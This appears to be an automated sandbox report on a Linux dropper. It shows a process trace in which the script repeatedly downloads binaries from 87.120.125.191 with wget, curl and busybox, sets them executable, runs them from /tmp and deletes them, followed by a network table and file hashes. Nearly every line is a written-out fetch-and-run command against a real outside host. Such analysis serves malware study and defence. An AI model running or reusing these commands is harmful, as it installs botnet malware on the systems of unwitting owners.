[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |